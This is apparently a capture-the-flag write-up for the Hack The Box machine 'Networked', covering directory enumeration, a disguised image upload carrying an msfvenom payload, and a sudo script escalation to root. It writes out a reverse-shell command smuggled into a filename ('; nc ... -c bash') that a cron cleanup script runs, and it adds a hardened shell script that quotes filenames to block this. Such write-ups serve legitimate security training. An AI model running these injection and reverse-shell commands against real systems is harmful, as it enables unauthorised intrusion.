Networked — HTB Walkthrough

Dhanishtha Awasthi
4 min read · Jul 18, 2020


ENUMERATION

Nmap Scan

80 HTTP Enumeration

Viewing the root page of the website and its source code, we get a hint that there may be folders named upload and gallery, but they aren't linked.

Gobuster scan

root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,js,html -u http://10.10.10.146

Revealed backup and upload, both with response code 301.

We see a backup.tar file on the website. Let's get it onto our machine, either by downloading it directly or with wget http://10.10.10.146/backup/backup.tar

Now viewing index.php in the browser gives

The index page is displayed, so index.php is the index; let's do the same with upload and photos.

EXPLOITATION

To upload the file we can capture the request in Burp,

make the changes as follows and make it a GIF. You can see that GIF is a supported type in the upload.php code we got from the archived backup.tar file.

The payload used above was created with msfvenom.

On photos.php

Now use exploit/multi/handler, set LHOST and LPORT accordingly, and open the file.

The link can be found in the source code of the website.

Go to this link and a shell pops up.

GETTING USER

Going to /home/guly I see

Checking the cronjobs for the user shows a file check_attack being run by the user guly.

Checking the contents of the file, we see nohup is being run.

Nohup, short for no hang up, is a command on Linux systems that keeps processes running even after exiting the shell or terminal. Nohup prevents the processes or jobs from receiving the SIGHUP (Signal Hang UP) signal.

https://www.google.com/search?client=firefox-b-d&q=nohup+command

What does this script do? It makes use of nohup and removes the files at $path$value, redirecting the output to /dev/null.

The path used is /var/www/html/uploads and value is any file != index.html.

What if we create a file name that terminates this command and gives us a reverse shell?

Example: file name = “; nc -nv 10.10.14.5 12345 -c bash”

Now the command becomes

nohup /bin/rm -f /var/www/html/uploads/ ; nc -nv 10.10.14.5 12345 -c bash > /dev/null 2>&1 &

What this does is start the no-hangup command and remove a file from the path /var/www/html/uploads, but the shell treats the ‘;’ as the end of that command, runs the next command, nc -nv 10.10.14.5 12345 -c bash, in the background (because of the trailing &), and that gives us a shell.

On netcat we see the reverse shell.
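The root cause above is that the filename is expanded unquoted into a command string, so the shell parses its characters as syntax. As an added example (not the box's own check_attack code), here is the same cleanup loop written so a filename can only ever be data: the expansion is quoted and passed after `--`, and names outside a small allowlist are flagged. A scratch directory created with mktemp stands in for /var/www/html/uploads.

```shell
#!/bin/sh
# Added example (not the box's own check_attack code): a cleanup loop that
# deletes uploads the way check_attack intends to, but with the filename
# quoted and passed after '--', so it can never be parsed as a second command.

# Allow only names a legitimate upload could have: characters [A-Za-z0-9._-],
# no leading '-' (would look like an rm option), no leading '.', no '/'.
is_safe_name() {
    case "$1" in
        ""|-*|.*|*/*)        return 1 ;;
        *[!A-Za-z0-9._-]*)   return 1 ;;
        *)                   return 0 ;;
    esac
}

# Remove every regular file in directory $1 except index.html.
# Vulnerable original shape:  nohup /bin/rm -f $path$value > /dev/null 2>&1 &
# (unquoted, so a name containing ';' ends the rm command and starts another).
# Hardened shape below: "$f" is one argument whatever characters it holds.
clean_uploads() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        [ "$name" = index.html ] && continue
        is_safe_name "$name" || printf 'suspicious upload name: %s\n' "$name" >&2
        rm -f -- "$f" >/dev/null 2>&1
    done
}

# Self-check on constructed files in a scratch directory standing in for
# /var/www/html/uploads. Returns 0 when index.html survives, both uploads
# are deleted, and the metacharacter name was treated as data, not code.
demo() {
    tmp=$(mktemp -d)
    : > "$tmp/index.html"
    : > "$tmp/cat.gif"
    : > "$tmp/; echo injected"
    clean_uploads "$tmp" 2>/dev/null
    [ -f "$tmp/index.html" ] &&
        [ ! -e "$tmp/cat.gif" ] &&
        [ ! -e "$tmp/; echo injected" ]
}
```

Run `demo` to exercise the loop; the suspicious-name message on stderr is the hook a defender would forward to a log or alert.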

PRIVILEGE ESCALATION

On enumerating sudo privileges for guly I see

There is a script, changename.sh, that can be run with sudo as root without a password.

Let’s check the script

On running the script I see this

So we see this is a kind of network script. First I tried to exploit ifup by setting a fake path and a reverse shell command in ifup. But since our script doesn't reach that far, I searched for

What I entered was something like this

Note that I was first copy-pasting the whole command, but simply entering <anynamelikeNETWORK /bin/sh> worked. We see we are root now.

We can now get root.txt from /root/root.txt

ROOTED!!!


Written by Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.